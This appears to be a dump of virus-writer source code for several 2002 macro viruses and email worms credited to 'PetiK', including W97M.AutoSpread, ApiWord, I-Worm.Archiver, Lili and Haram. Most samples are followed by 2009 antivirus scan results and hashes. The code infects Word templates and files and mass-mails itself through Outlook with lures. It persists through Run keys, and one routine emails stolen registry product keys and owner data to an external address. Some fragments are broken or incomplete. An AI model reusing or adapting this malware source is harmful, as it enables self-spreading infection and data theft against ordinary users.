newhtm.WriteLine "<html><head><title>Welcome</title>"
newhtm.WriteLine "<body onLoad=""window.status='Welcome to my last creation'"">"
read=""
For pos=1 To Len(htm) Step 2
read=read & Chr("&h"& Mid(htm,pos,2))
Next
newhtm.Write read
newhtm.WriteLine "</body></html>"
newhtm.Close
ws.Run "C:\Welcome2U.htm"
File Welcome.htm received on 05.16.2009 19:58:08 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 HTML/Htz
AntiVir 7.9.0.168 2009.05.15 VBS/Petik.1
Authentium 5.1.2.4 2009.05.16 VBS/Chu.C@mm
AVG 8.5.0.336 2009.05.15 VBS/Nuel
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.7F8BE6E9
CAT-QuickHeal 10.00 2009.05.15 VBS/Chu.C
ClamAV 0.94.1 2009.05.16 Worm.VBS.Petik
eSafe 7.0.17.0 2009.05.14 VBS.TVKid.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Nuel.B
F-Prot 4.4.4.56 2009.05.16 VBS/Chu.C@mm
Fortinet 3.117.0.0 2009.05.16 VBS/Htz@mm
GData 19 2009.05.16 Generic.ScriptWorm.7F8BE6E9
K7AntiVirus 7.10.737 2009.05.16 -
McAfee 5616 2009.05.15 VBS/Nuel@MM
McAfee+Artemis 5616 2009.05.15 VBS/Nuel@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Petik.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.gen
Norman 6.01.05 2009.05.16 VBS/Petik.P
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.J@mm
Panda 10.0.0.14 2009.05.16 VBS/Petik.L
PCTools 4.4.2.0 2009.05.16 VBS.Acroph.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.VBS.Petik
Sophos 4.41.0 2009.05.16 VBS/Petik-W
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Manu@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.G
VirusBuster 4.6.5.0 2009.05.16 VBS.Acroph.A
MD5...: 8b66aadcff8510521ba7f0bacb6fc54a
SHA1..: e1022a03f29f2ffd74764d6e4547b691c16991bc
' Name : W97M.AutoSpread
' Author : PetiK
' Date : 09/05/2002
Attribute VB_Name = "AutoSpread"
Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)
Sub AutoOpen()
nam = ActiveDocument.Name
vnam = Left(nam, Len(nam) - 4)
Call FuckProtection
Call InfectWord
Call Spread
MsgBox "This Document is infected by W97M." + vnam, vbCritical, "W97M." + vnam + ".A"
End If
End Sub
Sub InfectWord()
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcmod = "C:\kitep.drv"
If nor.Item("AutoSpread").Name <> "AutoSpread" Then
doc("AutoSpread").Export srcmod
nor.Import srcmod
End If
If doc.Item("AutoSpread").Name <> "AutoSpread" Then
nor("AutoSpread").Export srcmod
doc.Import srcmod
ActiveDocument.Save
End If
Kill (srcmod)
End Sub
Sub FuckProtection()
With Options
End With
Case "10.0"
Case "9.0"
End Select
End Sub
Sub Spread()
subj = Left(ActiveDocument.Name, Len(ActiveDocument.Name) - 4)
att = ActiveDocument.FullName
FileSystem.MkDir win + "\AutoSpread"
x = 0
nfile = ""
Do While x < 8
Randomize (Timer)
nfile = nfile + Chr(Int(Rnd(1) * 8) + 48)
x = x + 1
Loop
reg = nfile
nfile = nfile + ".vbs"
nfile = win + "\AutoSpread\" + nfile
Open nfile For Output As #1
Print #1, "'From W97M.AutoSpread"
Print #1, "Set out=CreateObject(""Outlook.Application"")"
Print #1, "Set map=out.GetNameSpace(""MAPI"")"
Print #1, "For Each C in map.AddressLists"
Print #1, "If C.AddressEntries.Count <> 0 Then"
Print #1, "For D=1 To C.AddressEntries.Count"
Print #1, "Set E=C.AddressEntries(D)"
Print #1, "Set env=out.CreateItem(0)"
Print #1, "env.To=E.Address"
Print #1, "env.Subject=""" + subj + """"
Print #1, "env.Body=""This confidential document is for you."""
Print #1, "env.Attachments.Add(""" + att + """)"
Print #1, "env.DeleteAfterSubmit=True"
Print #1, "If env.To <> """" Then"
Print #1, "env.Send"
Print #1, "End If"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "WScript.Quit"
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", reg) = nfile
End Sub
Sub HelpAbout()
.Visible = True
End With
.Text = "W97M.AutoSpread.A coded by PetiK (c)2002"
.Heading = "W97M.AutoSpread"
.Show
End With
slp = Sleep(5000)
For nb = 1 To Int(Rnd(1) * 10) + 1

Selection.TypeText "Hi guy, You're infected by my virus. It's not dangerous. "
Selection.TypeText "Refer to AntiVirus site to disinfect your computer. "
Selection.TypeText "No dangerous payload, large spread, it's coded by PetiK. "
Next nb
End Sub
76406570.vbs
'From W97M.AutoSpread
Set out=CreateObject("Outlook.application")
For Each C in map.AddressLists
Set env=out.CreateItem(0)
env.To=E.Address
env.Subject="HelloWorld"
env.Body="This confidential document is for you."
env.Attachments.Add("C:\PetiK\W32.HLLW.RLF\HelloWorld.doc")
env.DeleteAfterSubmit=True
If env.To <> "" Then
env.Send
End If
Next
End If
Next
WScript.Quit
File AutoSpread.doc received on 05.16.2009 10:45:28 (CET)

AhnLab-V3 5.0.0.2 2009.05.15 W97M/Apish.B
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 W97M/Beko.B@mm
Avast 4.8.1335.0 2009.05.15 MW97:Beko family
AVG 8.5.0.336 2009.05.15 W97M/Beko
BitDefender 7.2 2009.05.16 W97M.Petik.A@mm
CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M
ClamAV 0.94.1 2009.05.15 WM.Pivis
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 Win32.Petik
eTrust-Vet 31.6.6508 2009.05.16 W97M/Beko.B:mm
F-Prot 4.4.4.56 2009.05.15 W97M/Beko.B@mm
Fortinet 3.117.0.0 2009.05.16 W97M/Petik.B
GData 19 2009.05.16 W97M.Petik.A@mm
K7AntiVirus 7.10.735 2009.05.14 Macro.Beko
Microsoft 1.4602 2009.05.16 Virus:W97M/Aspread.A@mm
NOD32 4080 2009.05.15 W97M/Beko.B
Norman 6.01.05 2009.05.16 W97M/Beko.B
nProtect 2009.1.8.0 2009.05.16 W97M.Petik.A@mm
Panda 10.0.0.14 2009.05.15 W97M/CokeBoy
PCTools 4.4.2.0 2009.05.15 WORD.97.Petaspr.A
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Worm.Mail.Agent.ac
Sophos 4.41.0 2009.05.16 WM97/Spread-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 W97M.Beko@mm
TrendMicro 8.950.0.1092 2009.05.15 W97M_BEKO.B
ViRobot 2009.5.15.1737 2009.05.15 W97M.Beko.B
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petaspr.A
MD5...: b7f7ed86d457fec2493db21e8886b981
SHA1..: 5f1c2e11b84ac3df1e06f9dc290c3706735b8065
/*
Name : I-Worm.Archiver
Author : PetiK
Date : Mai 10th 2002 -
Language : C++
Comments : Infect ZIP files which run with WINZIP.
We can also to do the same think with PowerArchiver:

powerarc -a -c4 archive.zip virus.exe
*/
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
char *fnam[]={"news","support","info","newsletter","webmaster"};
char
*fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@virusli
st.com"};
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
Folders";
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;
BOOL installed;
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
void infzip(char *);

{
GetModuleFileName(hInst,filen,100);
GetWindowsDirectory((char *)copyn,100);
strcpy(windir,copyn);
strcat(copyn,"\\Archiver.exe");
installed=FALSE;
if(cmdLine) {
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'p':
ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance -
(c)2002",
"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
ExitProcess(0);
break;
}
}
}
if(!installed) {
CopyFile(filen,copyn,FALSE);
strcpy(copyreg,copyn);
strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
ExitProcess(0);
}
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App
Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
RegCloseKey(hReg);
if(strlen(winzip)!=0) {
infzip(windir);
infzip(sysdir);
infzip(desktop);
infzip(personal);
infzip(favoris);
infzip("C:\\");
}
/*
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
do {
for(i=0;i<8;i++)
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
fsubj[0]=0;
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
mes->ulReserved=0;
mes->lpszSubject=fsubj;
mes->lpszNoteText="This is some news send by our firm about security.\n"
"Please read by clicking on attached file.\n"
"\tBest Regards";
mes->nRecipCount=1;
mes->nFileCount=1;
mes->lpFiles->lpszPathName=filen;
mes->lpFiles->lpszFileName=attname;
}
free(mes->lpFiles);
mFreeBuffer(mes);
FreeLibrary(hMAPI);
}
*/
ExitProcess(0);
}
void infzip(char *folder)
{
register HANDLE fh;
if(strlen(folder)!=0) {
fh=FindFirstFile("*.zip",&ffile);
if(fh!=INVALID_HANDLE_VALUE) {
while(abc) {
inzip[0]=0;
wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
WinExec(inzip,1);
abc=FindNextFile(fh,&ffile);
}
}
}
}
File Archiver.exe received on 05.16.2009 10:45:20 (CET)

AntiVir 7.9.0.168 2009.05.15 Worm/Petik-1
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.J@mm
ClamAV 0.94.1 2009.05.15 Worm.Archer
Comodo 1157 2009.05.08 Worm.Win32.Petik.Archer
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Petik.49152
eSafe 7.0.17.0 2009.05.14 Win32.Petik.b
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.23040
F-Prot 4.4.4.56 2009.05.15 W32/Malware!185a
GData 19 2009.05.16 Win32.Petik.J@mm
McAfee 5616 2009.05.15 W32/Stopin.d@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.d@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik-1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick
NOD32 4080 2009.05.15 Win32/Petik.Archer
Norman 6.01.05 2009.05.16 W32/Petik.AM
PCTools 4.4.2.0 2009.05.15 HLLW.Petarch.A
Rising 21.29.51.00 2009.05.16 Worm.Archivera
Sophos 4.41.0 2009.05.16 W32/Archiver-A
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.C
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Archiver
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 HLLW.Petarch.A
MD5...: 6079048134255a415e569a57402d7c56
SHA1..: 35867a4491825a6c2557e6103cb6164705d6328d
SHA256: f88aec37d60795ac97b73574b674bbf40bd8466dac54a33b1e1a8c0df8035391
' Name : W97M.ApiWord
' Author : PetiK
' Date : 14/05/2002
VB_Name = "ApiWord"
Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)
Private Declare Function CopyFile& Lib "kernel32" Alias "CopyFileA" (ByVal
lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As
Boolean)
Private Declare Function CreateDirectory& Lib "kernel32" Alias "CreateDirectoryA" (ByVal
lpszCrDir As String, ByVal secu As Long)
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal
dwReserved As Long)
Private Declare Function ShowCursor& Lib "user32" (ByVal fshow As Boolean)
Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias
"WritePrivateProfileStringA" _
(ByVal lpszSection As String, ByVal lpszKey As String, _
ByVal lpszString As String, ByVal lpszFile As String)
Sub AutoOpen()
slp = Sleep(1000)
winp = Environ("windir")
crd = CreateDirectory(winp + "\ApiSystem", 0)
cp = CopyFile(ActiveDocument.FullName, winp + "\ApiSystem\HelloU.doc", False)
Call endprotect
Call infdoc
Call SrchF
Call PayLoad
End Sub
Sub HelpAbout()
MsgBox "System must be shutdown.", vbCritical, "Warning"
ext = ExitWindowsEx(2, 0)
End Sub
Sub SrchF()
infile = winp + "\ApiSystem\AboutU.ini"
MS = "HKEY_LOCAL_MACHINE\Software\Microsoft\ApiWord"
If System.PrivateProfileString("", MS, "Send Info") <> "OK" Then
CV = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
nom = System.PrivateProfileString("", CV, "RegisteredOwner")
ent = System.PrivateProfileString("", CV, "RegisteredOrganization")
ver = System.PrivateProfileString("", CV, "Version")
vern = System.PrivateProfileString("", CV, "VersionNumber")
pi = System.PrivateProfileString("", CV, "ProductId")
pk = System.PrivateProfileString("", CV, "ProductKey")
pf = System.PrivateProfileString("", CV, "ProgramFilesDir")
sp = System.PrivateProfileString("", _
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page")
wr = WritePrivateProfileString("Information", "Name", nom, infile)

wr = WritePrivateProfileString("Information", "Organization", ent, infile)
wr = WritePrivateProfileString("Information", "Version of Windows", ver, infile)
wr = WritePrivateProfileString("Information", "Number of Version", vern, infile)
wr = WritePrivateProfileString("Information", "Identification Number", pi, infile)
wr = WritePrivateProfileString("Information", "Key Number", pk, infile)
wr = WritePrivateProfileString("Information", "Program Files Path", pf, infile)
wr = WritePrivateProfileString("Information", "Start Page", sp, infile)
Set out = CreateObject("Outlook.Application")

Set map = out.GetNameSpace("MAPI")
map.Logon "profile", "password"
mel = out.CreateItem(0)
mel.To = "apiinfo@lycos.fr"
mel.Subject = "Mail from " + nom
mel.Attachments.Add (infile)
mel.DeleteafterSubmit = True
mel.Send
map.Logoff
System.PrivateProfileString("", MS, "Author") = "PetiK"
System.PrivateProfileString("", MS, "Info File") = infile
System.PrivateProfileString("", MS, "Name") = "W97M.ApiWord"
System.PrivateProfileString("", MS, "Version") = "A"
System.PrivateProfileString("", MS, "Send Info") = "OK"
End If
End Sub
Sub infdoc()
DropFile = winp + "\ApiSystem\src.txt"
If Nor.Item("ApiWord").Name <> "ApiWord" Then
Doc("ApiWord").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("ApiWord").Name <> "ApiWord" Then
Nor("ApiWord").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub
Sub endprotect()
With Options
End With
Case "10.0"
Case "9.0"
End Select
End Sub
Sub PayLoad()
num = Int((Rnd * 10) + 1)
If num = 1 Then
sm = SwapMouseButton(&H2)
ElseIf num = 5 Then
sc = ShowCursor(False)
slp = Sleep(10000)
sc = ShowCursor(True)
End If
End Sub
File ApiWord.doc received on 05.16.2009 10:45:11 (CET)

a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Petik.B!IK
AhnLab-V3 5.0.0.2 2009.05.15 W97M/Apish
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.Petik
Authentium 5.1.2.4 2009.05.15 W97M/Apish.A
Avast 4.8.1335.0 2009.05.15 MW97:Apish-A
AVG 8.5.0.336 2009.05.15 W97M/Droopy
BitDefender 7.2 2009.05.16 W97M.Petik.B
CAT-QuickHeal 10.00 2009.05.15 W97M.Prilissa
ClamAV 0.94.1 2009.05.15 W97M.Petik.B
Comodo 1157 2009.05.08 Virus.MSWord.Petik.b
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 W97M.ApiWord
eTrust-Vet 31.6.6508 2009.05.16 W97M/Apish.A
F-Prot 4.4.4.56 2009.05.15 W97M/Apish.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Petik.b
Fortinet 3.117.0.0 2009.05.16 W97M/Petik.B
GData 19 2009.05.16 W97M.Petik.B
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Petik.B
K7AntiVirus 7.10.735 2009.05.14 Macro.Petik.b
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Petik.b
Microsoft 1.4602 2009.05.16 Virus:W97M/Petik.B
NOD32 4080 2009.05.15 W97M/Apish.A
Norman 6.01.05 2009.05.16 W97M/Amish.A
nProtect 2009.1.8.0 2009.05.16 W97M.Petik.B
Panda 10.0.0.14 2009.05.15 W97M/CokeBoy
PCTools 4.4.2.0 2009.05.15 WORD.97.Petapwd.A
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Macro.Word.ApiWord
Sophos 4.41.0 2009.05.16 WM97/Petik-B
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Petik.b (v)
Symantec 1.4.4.12 2009.05.16 W97M.Apish
TrendMicro 8.950.0.1092 2009.05.15 W97M_PETIK.B
VBA32 3.12.10.5 2009.05.16 Virus.MSWord.Petik.b
ViRobot 2009.5.15.1737 2009.05.15 W97M.Apish.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petapwd.A
MD5...: 0b6d3ba97c607d4c334e45fda1907912
SHA1..: 826552b0aa5837a1c4c205d8c980d103deaafc01
' Name : W32.HLLW.Visual
' Author : PetiK
' Language : Visual Basic
' Date : 19/05/2002
'
'
'
'
Attribute VB_Name = "Module1"
Sub Main()
Set fso = CreateObject("Scripting.FilesystemObject")
orig = App.Path & "\" & App.EXEName & ".exe"
cop = fso.GetSpecialFolder(1) & "\kern32dll.exe"
FileCopy orig, cop
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kern32dll", cop
fso.CreateFolder ("C:\Backup")
ncopy = ""
For I = 1 To 10
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
FileCopy orig, "C:\Backup\" & ncopy & ".exe"
Call inf(ws.SpecialFolders("MyDocuments"))

If out = "Outlook" Then
For y = 1 To map.AddressLists.Count
Set z = map.AddressLists(y)
x = 1
Set mel = out.CreateItem(0)
For oo = 1 To z.AddressEntries.Count
e = z.AddressEntries(x)
ml.Recipients.Add e
x = x + 1
If x < 250 Then oo = z.AddressEntries.Count
Next oo
mel.Subject = "New Visual Tool for U"
mel.Body = "Look at this new tool by clicking on attached file."
mel.Attachments.Add orig, 1, 1, "visual_tool.exe"
mel.Send
e = ""
Next y
map.Logoff
End If
If Day(Now) = 19 Then about.Visible = True

End Sub
Sub inf(folder)
Set dire = fso.GetFolder(folder)
Set fc = dire.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
oext = LCase(f1.Name)
If (ext <> "vbs") Then
If (Right(oext, 8) <> "old_.exe") Then
'MsgBox oext, vbInformation, Right(oext, 8)
FileCopy orig, f1.Path & "old_.exe"
End If
End If
Next
End Sub
File Visual.exe received on 05.16.2009 19:47:59 (CET)

a-squared 4.0.0.101 2009.05.16 Backdoor.Win32.VB!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Petvb.worm.9216
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K
Authentium 5.1.2.4 2009.05.16 W32/Malware!c440
Avast 4.8.1335.0 2009.05.15 Win32:Petik-C
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.K@mm
ClamAV 0.94.1 2009.05.16 Worm.VB-874
Comodo 1157 2009.05.08 Worm.Win32.Petik.VisTol
DrWeb 5.0.0.12182 2009.05.16 WIN.WORM.Virus
eSafe 7.0.17.0 2009.05.14 Win32.PetTick.dr
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petticky.A
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c440
Fortinet 3.117.0.0 2009.05.16 W32/Petik.U@mm
GData 19 2009.05.16 Win32.Petik.K@mm
Ikarus T3.1.1.49.0 2009.05.16 Backdoor.Win32.VB
McAfee 5616 2009.05.15 W32/PetTick.dr
McAfee+Artemis 5616 2009.05.15 W32/PetTick.dr
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K
NOD32 4080 2009.05.15 Win32/Petik.VisTol
Norman 6.01.05 2009.05.16 W32/Petik.AQ
Panda 10.0.0.14 2009.05.16 W32/Petik.R.worm
PCTools 4.4.2.0 2009.05.16 I-Worm.Petvtl.A
Rising 21.29.52.00 2009.05.16 Trojan.Petik.a
Sophos 4.41.0 2009.05.16 W32/Petik-U
Symantec 1.4.4.12 2009.05.16 W32.Pet_Ticky.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.A
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetLil.A
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petvtl.A
MD5...: b2ff3ada6672ac9266a6fac5842ae706
SHA1..: 93d70d8a36a4139f494fe82fb8d418104a72a899
' Name : W32.HLLW.Lili
' Author : PetiK
' Date : 31/05/2002

Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias
"WritePrivateProfileStringA" _
(ByVal lpszSection As String, ByVal lpszKey As String, _
ByVal lpszString As String, ByVal lpszFile As String)
Sub Main()
Call CopyWorm
Call inf(App.Path)
Call inf(ws.SpecialFolders("MyDocuments"))
Call inf(fso.GetSpecialFolder(0))
If Day(Now) = 1 Or Day(Now) = 15 Or Day(Now) = 31 Then

xxxpic.Show 1
Else
MsgBox "Sorry, no XXX pic today. Wait And See.", vbExclamation, "XXX Pic"
End If
End Sub
Sub CopyWorm()
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"
copywrm = fso.GetSpecialFolder(0)
If Right(copywrm, 1) <> "\" Then copywrm = copywrm & "\"
For I = 1 To 8
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
copywrm = copywrm & ncopy & ".exe"
FileCopy orig, copywrm
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NewName", copywrm
Call WritePrivateProfileString("rename", "NUL", orig, "WININIT.INI")
FileCopy orig, "C:\XXXPic.exe"

x = 1
ml.Recipients.Add e
x = x + 1
Next oo
mel.Subject = "XXX Picture..."
mel.Body = "A pretty girl waits for you. Click on attached file..."
mel.Attachments.Add "C:\XXXPic.exe"
mel.Send
e = ""
Next y
map.Logoff
End If
End Sub
Sub inf(dir)
orig = ""
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"

Set pwoj = fso.GetFolder(dir)
Set fc = pwoj.Files
For Each f1 In fc
ext = LCase(fso.GetExtensionName(f1.Path))
If (ext = "vbs") Or (ext = "htm") Or (ext = "doc") Or (ext = "xls") Or (ext = "bmp") _
Or (ext = "gif") Or (ext = "jpg") Or (ext = "pdf") Or (ext = "js") Then
cpy = ""
cpy = Left(f1.Path, Len(f1.Path) - 4)
FileCopy orig, cpy & ".exe"
reg = fso.GetBaseName(f1.Path)
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & reg, cpy & ".exe"
End If
Next
End Sub
File Liliworm.exe received on 05.16.2009 17:43:19 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Lorm!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetLil.worm.37376
AntiVir 7.9.0.168 2009.05.15 VBS/Gorum.XPic.2
Authentium 5.1.2.4 2009.05.16 W32/Petik.A@mm
Avast 4.8.1335.0 2009.05.15 Win32:PetLil
AVG 8.5.0.336 2009.05.15 I-Worm/Lorm
BitDefender 7.2 2009.05.16 Win32.Petlil.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Lorm
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Lorm.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Generic.58
eSafe 7.0.17.0 2009.05.14 Win32.Lorm
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petlil.A
F-Prot 4.4.4.56 2009.05.16 W32/Petik.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Lorm
Fortinet 3.117.0.0 2009.05.16 W32/Petik.A@mm
GData 19 2009.05.16 Win32.Petlil.B@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Lorm
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Lorm
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Lorm
McAfee 5616 2009.05.15 W32/PetLil@MM
McAfee+Artemis 5616 2009.05.15 W32/PetLil@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Gorum.XPic.2
Microsoft 1.4602 2009.05.16 Worm:Win32/PetLil@mm
NOD32 4080 2009.05.15 Win32/Lorm.A
Norman 6.01.05 2009.05.16 Pet_Tick.37376.A
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Lorm.37376
Panda 10.0.0.14 2009.05.16 W32/Petlil.A
PCTools 4.4.2.0 2009.05.16 I-Worm.Petlil.A
Rising 21.29.52.00 2009.05.16 Worm.Liliworm
Sophos 4.41.0 2009.05.16 W32/Petlil-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Pet_Ticky.B@mm
Symantec 1.4.4.12 2009.05.16 W32.Pet_Ticky.B@mm
TheHacker 6.3.4.1.326 2009.05.15 W32/Lorm
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETLIL.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Lorm
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetLil.B
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petlil.A
MD5...: fce1de67fd47f4b6b67ab7eba0bf4246
SHA1..: bc50ef3b75ee04316ce9e24ba5707ba21ad308a1
comment *
Name : I-Worm.Haram
Author : PetiK
Language : win32asm
Date : May 13th 2002 - June 1st 2002
Size : 5192 bytes (compressed with Petite Tool)
Comments : - Copy to %sysdir%\FunnyGame.exe

- Search all doc files in "Personal" folder and create a new virus html file:
example : document.doc -> document.htm

1) 2)
1) Good DOC file

2) Good HTM virus (1571 bytes)
- Put the name of all active process and add .htm:
example : process.exe -> process.exe.htm

3) 4)
3) Real name of active process

4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP)
- Create a random name file in StarUp folder to spread with Outlook
- On the 10th, payload : open and close CD door and display a messagebox in
loop
.586p
.model flat
.code
JUMPS
include win32api.inc
LF equ 10
CR equ 13
CRLF equ <13,10>
@pushsz macro msg2psh, empty

local next_instr
ifnb <empty>
%out too much arguments in macro '@pushsz'
.err
endif
call next_instr
db msg2psh,0
next_instr:
endm
@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm
api macro a
extrn a:proc
call a
endm
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
start: pushad
@SEH_SetupFrame <jmp end_worm>
hide_the_worm:
call hide_worm
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
add edi,eax
mov eax,'nuF\'
stosd
mov eax,'aGyn'
stosd
mov eax,'e.em'
stosd
mov eax,'ex'
stosd
pop edi
copy_worm:
push 1
push edi
push esi
api CopyFileA
test eax,eax
je ok_copy
push 50
push edi
push 1
@pushsz "Haram"
push 80000002h
api SHSetValueA
push 50
push offset msgwrm
push esi
api GetFileTitleA
push 10h
push offset msgwrm
@pushsz "ERROR : this file is not a valid Win32 file."
push 0
api MessageBoxA
ok_copy:
